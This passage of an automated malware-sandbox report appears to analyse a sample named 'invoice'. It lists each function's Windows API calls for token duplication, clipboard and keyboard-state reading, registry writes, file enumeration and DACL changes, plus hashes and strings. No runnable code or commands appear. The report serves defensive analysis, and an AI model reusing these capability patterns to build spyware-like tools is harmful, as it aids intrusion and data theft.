                          • Part of subcall function 00FD8AA3: GetLastError.KERNEL32 ref: 00FD8B27
                        • _memset.LIBCMT ref: 00FD867B
                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00FD86CD
                        • CloseHandle.KERNEL32(?), ref: 00FD86DE
                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00FD86F5
                        • GetProcessWindowStation.USER32 ref: 00FD870E
                        • SetProcessWindowStation.USER32(00000000), ref: 00FD8718
                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00FD8732
                          • Part of subcall function 00FD84F3: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FD8631), ref: 00FD8508
                          • Part of subcall function 00FD84F3: CloseHandle.KERNEL32(?,?,00FD8631), ref: 00FD851A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                        • String ID: $default$winsta0
                        • API String ID: 2063423040-1027155976
                        • Opcode ID: ef0379c04e302ad29b914852339cc89d5a41535e2df0a0b4fb812b5400647002
                        • Instruction ID: d3be6dedae01cf3e78e55312147cf9130ca45686baac95a2668d4d94f057f109
                        • Opcode Fuzzy Hash: ef0379c04e302ad29b914852339cc89d5a41535e2df0a0b4fb812b5400647002
                        • Instruction Fuzzy Hash: 69817CB1D00209AFDF21DFA5CC45AEE7B7AEF04354F08416AF954A6250DB358E06FB60
                        Function 00FF407C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                        Download Yara Rule
                        APIs
                        • OpenClipboard.USER32(0100F910), ref: 00FF40A6
                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00FF40B4
                        • GetClipboardData.USER32(0000000D), ref: 00FF40BC
                        • CloseClipboard.USER32 ref: 00FF40C8
                        • GlobalLock.KERNEL32(00000000), ref: 00FF40E4
                        • CloseClipboard.USER32 ref: 00FF40EE
                        • GlobalUnlock.KERNEL32(00000000), ref: 00FF4103
                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00FF4110
                        • GetClipboardData.USER32(00000001), ref: 00FF4118
                        • GlobalLock.KERNEL32(00000000), ref: 00FF4125
                        • GlobalUnlock.KERNEL32(00000000), ref: 00FF4159
                        • CloseClipboard.USER32 ref: 00FF4269
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                        • String ID:
                        • API String ID: 3222323430-0
                        • Opcode ID: 6919ecd9c0b9017016ed84e82ed90476574c6f96f1ef8970e054e19688df31ad
                        • Instruction ID: d315bdef52c3bf7ed3d53f2fd67a7bbd01b11f28e183a16def781a5250da868a
                        • Opcode Fuzzy Hash: 6919ecd9c0b9017016ed84e82ed90476574c6f96f1ef8970e054e19688df31ad
                        • Instruction Fuzzy Hash: 9A519135204306ABD322FF60DC85F7F77A8AF84B10F140529F686D21A1DF79E905AB62
                        Function 00FEC7E8 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 00FEC819
                        • FindClose.KERNEL32(00000000), ref: 00FEC86D
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FEC892
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FEC8A9
                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FEC8D0
                        • __swprintf.LIBCMT ref: 00FEC91C
                        • __swprintf.LIBCMT ref: 00FEC95F
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                        • __swprintf.LIBCMT ref: 00FEC9B3
                          • Part of subcall function 00FA3818: __woutput_l.LIBCMT ref: 00FA3871
                        • __swprintf.LIBCMT ref: 00FECA01
                          • Part of subcall function 00FA3818: __flsbuf.LIBCMT ref: 00FA3893
                          • Part of subcall function 00FA3818: __flsbuf.LIBCMT ref: 00FA38AB
                        • __swprintf.LIBCMT ref: 00FECA50
                        • __swprintf.LIBCMT ref: 00FECA9F
                        • __swprintf.LIBCMT ref: 00FECAEE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                        • API String ID: 3953360268-2428617273
                        • Opcode ID: ca77cda169eed3b5c22b6ce676ad1bf8e0e5388352750bd8517befbe6bc96e58
                        • Instruction ID: 69ef10b86bb4dd2c23a30dd278c9d27d7288e516f8ed9d68f3c43b851d6323d5
                        • Opcode Fuzzy Hash: ca77cda169eed3b5c22b6ce676ad1bf8e0e5388352750bd8517befbe6bc96e58
                        • Instruction Fuzzy Hash: A9A150B2408304ABC714FB65CC86DEFB7ECEF84700F444919B586C6191EB78DA08D7A2
                        Function 00FEF021 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00FEF042
                        • _wcscmp.LIBCMT ref: 00FEF057
                        • _wcscmp.LIBCMT ref: 00FEF06E
                        • GetFileAttributesW.KERNEL32(?), ref: 00FEF080
                        • SetFileAttributesW.KERNEL32(?,?), ref: 00FEF09A
                        • FindNextFileW.KERNEL32(00000000,?), ref: 00FEF0B2
                        • FindClose.KERNEL32(00000000), ref: 00FEF0BD
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00FEF0D9
                        • _wcscmp.LIBCMT ref: 00FEF100
                        • _wcscmp.LIBCMT ref: 00FEF117
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00FEF129
                        • SetCurrentDirectoryW.KERNEL32(01038920), ref: 00FEF147
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FEF151
                        • FindClose.KERNEL32(00000000), ref: 00FEF15E
                        • FindClose.KERNEL32(00000000), ref: 00FEF170
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                        • String ID: *.*
                        • API String ID: 1803514871-438819550
                        • Opcode ID: 38933e9feffebff90831ba6e79fbf1d52de5309b7b96cbd94f3b60adc1925cc5
                        • Instruction ID: 13f55665e0b8d186a14af4e83637f4065c11feb7b3bb07c632fa73b6d918348b
                        • Opcode Fuzzy Hash: 38933e9feffebff90831ba6e79fbf1d52de5309b7b96cbd94f3b60adc1925cc5
                        • Instruction Fuzzy Hash: C531037290024EABDB30EFB1DC49ADE73AC9F49330F0041A6F840D2191EB39DA49EB54
                        Function 010008E2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010009DE
                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0100F910,00000000,?,00000000,?,?), ref: 01000A4C
                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 01000A94
                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 01000B1D
                        • RegCloseKey.ADVAPI32(?), ref: 01000E3D
                        • RegCloseKey.ADVAPI32(00000000), ref: 01000E4A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Close$ConnectCreateRegistryValue
                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                        • API String ID: 536824911-966354055
                        • Opcode ID: 3d693f85ee9ca25b4c9e331383bc04dbc858a1a7277e0ee274bee8e2dd6179f1
                        • Instruction ID: 159f672905ade8b4c88e2def07a4a0e91294ef7ee2e7a3f67d8335f985fd8816
                        • Opcode Fuzzy Hash: 3d693f85ee9ca25b4c9e331383bc04dbc858a1a7277e0ee274bee8e2dd6179f1
                        • Instruction Fuzzy Hash: 660291752046019FDB15EF28C885E6AB7E5FF88714F04845DF88A9B3A2CB78ED41DB81
                        Function 00FEF17E Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00FEF19F
                        • _wcscmp.LIBCMT ref: 00FEF1B4
                        • _wcscmp.LIBCMT ref: 00FEF1CB
                          • Part of subcall function 00FE43C6: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00FE43E1
                        • FindNextFileW.KERNEL32(00000000,?), ref: 00FEF1FA
                        • FindClose.KERNEL32(00000000), ref: 00FEF205
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00FEF221
                        • _wcscmp.LIBCMT ref: 00FEF248
                        • _wcscmp.LIBCMT ref: 00FEF25F
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00FEF271
                        • SetCurrentDirectoryW.KERNEL32(01038920), ref: 00FEF28F
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FEF299
                        • FindClose.KERNEL32(00000000), ref: 00FEF2A6
                        • FindClose.KERNEL32(00000000), ref: 00FEF2B8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                        • String ID: *.*
                        • API String ID: 1824444939-438819550
                        • Opcode ID: db11b89e3438c233eb1f405a4b07a1cb65daebb6f60c1242f556ba8ac5d9e742
                        • Instruction ID: 77256b1b81f196b4286e85a81c0b9fc9c13049ca8fb2b6066cc22b6e8f2801fe
                        • Opcode Fuzzy Hash: db11b89e3438c233eb1f405a4b07a1cb65daebb6f60c1242f556ba8ac5d9e742
                        • Instruction Fuzzy Hash: A631033690069A7BCB20AFA2DC48EDE73AC9F45330F1441A6F940A21A0DB35DE49EB54
                        Function 00FEA279 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                        Download Yara Rule
                        APIs
                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FEA299
                        • __swprintf.LIBCMT ref: 00FEA2BB
                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00FEA2F8
                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00FEA31D
                        • _memset.LIBCMT ref: 00FEA33C
                        • _wcsncpy.LIBCMT ref: 00FEA378
                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00FEA3AD
                        • CloseHandle.KERNEL32(00000000), ref: 00FEA3B8
                        • RemoveDirectoryW.KERNEL32(?), ref: 00FEA3C1
                        • CloseHandle.KERNEL32(00000000), ref: 00FEA3CB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                        • String ID: :$\$\??\%s
                        • API String ID: 2733774712-3457252023
                        • Opcode ID: fe5ff540d4d1525f3f43f500a837e5f6ba21b16b5aee338c72d048f91de4b524
                        • Instruction ID: 3cee3ead82d49b26dacfc9384bb433fefea30ecc37a0e270c93ba5002b01bd96
                        • Opcode Fuzzy Hash: fe5ff540d4d1525f3f43f500a837e5f6ba21b16b5aee338c72d048f91de4b524
                        • Instruction Fuzzy Hash: 7D31C3B590014AABDB31DFA1DC45FEB73BCEF89710F1041B6FA08E2054E775A644AB25
                        Function 00FD81D4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00FD852A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FD8546
                          • Part of subcall function 00FD852A: GetLastError.KERNEL32(?,00FD800A,?,?,?), ref: 00FD8550
                          • Part of subcall function 00FD852A: GetProcessHeap.KERNEL32(00000008,?,?,00FD800A,?,?,?), ref: 00FD855F
                          • Part of subcall function 00FD852A: HeapAlloc.KERNEL32(00000000,?,00FD800A,?,?,?), ref: 00FD8566
                          • Part of subcall function 00FD852A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FD857D
                          • Part of subcall function 00FD85C7: GetProcessHeap.KERNEL32(00000008,00FD8020,00000000,00000000,?,00FD8020,?), ref: 00FD85D3
                          • Part of subcall function 00FD85C7: HeapAlloc.KERNEL32(00000000,?,00FD8020,?), ref: 00FD85DA
                          • Part of subcall function 00FD85C7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00FD8020,?), ref: 00FD85EB
                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FD8238
                        • _memset.LIBCMT ref: 00FD824D
                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FD826C
                        • GetLengthSid.ADVAPI32(?), ref: 00FD827D
                        • GetAce.ADVAPI32(?,00000000,?), ref: 00FD82BA
                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FD82D6
                        • GetLengthSid.ADVAPI32(?), ref: 00FD82F3
                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00FD8302
                        • HeapAlloc.KERNEL32(00000000), ref: 00FD8309
                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FD832A
                        • CopySid.ADVAPI32(00000000), ref: 00FD8331
                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FD8362
                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FD8388
                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FD839C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                        • String ID:
                        • API String ID: 3996160137-0
                        • Opcode ID: ecbac443115d7918cafc5f51ffd6e33c21e495623bc677de6157fcd90d6f6502
                        • Instruction ID: 8e5a0a57a413c91bc31b3d683bfbc383091da164f7d07ec86c59bd1df34da38b
                        • Opcode Fuzzy Hash: ecbac443115d7918cafc5f51ffd6e33c21e495623bc677de6157fcd90d6f6502
                        • Instruction Fuzzy Hash: BA616F7190020AEFDF21DF95DC44AEEBB7AFF05750F08812AF915A7240DB359A06EB60
                        Function 00F96841 Relevance: 18.4, Strings: 14, Instructions: 889COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                        • API String ID: 0-4052911093
                        • Opcode ID: 05701139583ace809d6ced26168939008a2923161d45051fb4199a3d67f9dcd8
                        • Instruction ID: 490b69474b985b9ed458da20028f1357ba11ccdf96d528714e71784e387ff214
                        • Opcode Fuzzy Hash: 05701139583ace809d6ced26168939008a2923161d45051fb4199a3d67f9dcd8
                        • Instruction Fuzzy Hash: AE725E75E002199BEF24CF59C850BAEB7B6FF44320F18815BE855EB390EB349A41EB50
                        Function 01000465 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 01000EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FFFE38,?,?), ref: 01000EBC
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01000537
                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 010005D6
                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0100066E
                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 010008AD
                        • RegCloseKey.ADVAPI32(00000000), ref: 010008BA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                        • String ID:
                        • API String ID: 1240663315-0
                        • Opcode ID: 61c6f52460d10ae2fff9eb731de867541826da13905f07770fe9dc22a5504c44
                        • Instruction ID: 22afa6d22068fd7490c4b9b0a1389aaeeefa5f9e35aedc77c783243f57f582d2
                        • Opcode Fuzzy Hash: 61c6f52460d10ae2fff9eb731de867541826da13905f07770fe9dc22a5504c44
                        • Instruction Fuzzy Hash: C7E18E30204200AFDB15EF28C884E6BBBE4FF89754F04856DF48ADB2A5DB35E901DB52
                        Function 00FE003A Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardState.USER32(?), ref: 00FE0062
                        • GetAsyncKeyState.USER32(000000A0), ref: 00FE00E3
                        • GetKeyState.USER32(000000A0), ref: 00FE00FE
                        • GetAsyncKeyState.USER32(000000A1), ref: 00FE0118
                        • GetKeyState.USER32(000000A1), ref: 00FE012D
                        • GetAsyncKeyState.USER32(00000011), ref: 00FE0145
                        • GetKeyState.USER32(00000011), ref: 00FE0157
                        • GetAsyncKeyState.USER32(00000012), ref: 00FE016F
                        • GetKeyState.USER32(00000012), ref: 00FE0181
                        • GetAsyncKeyState.USER32(0000005B), ref: 00FE0199
                        • GetKeyState.USER32(0000005B), ref: 00FE01AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: State$Async$Keyboard
                        • String ID:
                        • API String ID: 541375521-0
                        • Opcode ID: 87667775e6546767a0eab20fbc7ad9247ebc14fd39bdea4ec5a033ec7ac74ca2
                        • Instruction ID: 8dce6a84c9f5067d4a05bdaf7f143e54c5840513e4f2d79bddc771af907b428b
                        • Opcode Fuzzy Hash: 87667775e6546767a0eab20fbc7ad9247ebc14fd39bdea4ec5a033ec7ac74ca2
                        • Instruction Fuzzy Hash: 9441DC34D047CA6EFF358A6188047B5BEA06F11364F08409AD6C64B1C2DFED99C8E7A2
                        Function 00FF84D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                        • CoInitialize.OLE32 ref: 00FF8518
                        • CoUninitialize.OLE32 ref: 00FF8523
                        • CoCreateInstance.OLE32(?,00000000,00000017,01012BEC,?), ref: 00FF8583
                        • IIDFromString.OLE32(?,?), ref: 00FF85F6
                        • VariantInit.OLEAUT32(?), ref: 00FF8690
                        • VariantClear.OLEAUT32(?), ref: 00FF86F1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                        • API String ID: 834269672-1287834457
                        • Opcode ID: c8af357ea6c677a127f67c1c5bd6e09d2092c873e441c39e4c4917437d575b82
                        • Instruction ID: b4196ad97c0eeceb4dc5bc2ab1f0eee8ebf19781fc12b94bf108498e829ce024
                        • Opcode Fuzzy Hash: c8af357ea6c677a127f67c1c5bd6e09d2092c873e441c39e4c4917437d575b82
                        • Instruction Fuzzy Hash: 2861E3716083059FC710DF24C849B6EB7E8AF48764F08480DFA85DB2A1DB74ED45EB92
                        Function 00FF427A Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                        • String ID:
                        • API String ID: 1737998785-0
                        • Opcode ID: c954fe81b1e63310935107a70a31180d80b8eae8b8db2d97bd34c1937ab13429
                        • Instruction ID: 01302ff8508877022bc8a2668f523c22b2717038a4cfc68c6215f10464cf93a0
                        • Opcode Fuzzy Hash: c954fe81b1e63310935107a70a31180d80b8eae8b8db2d97bd34c1937ab13429
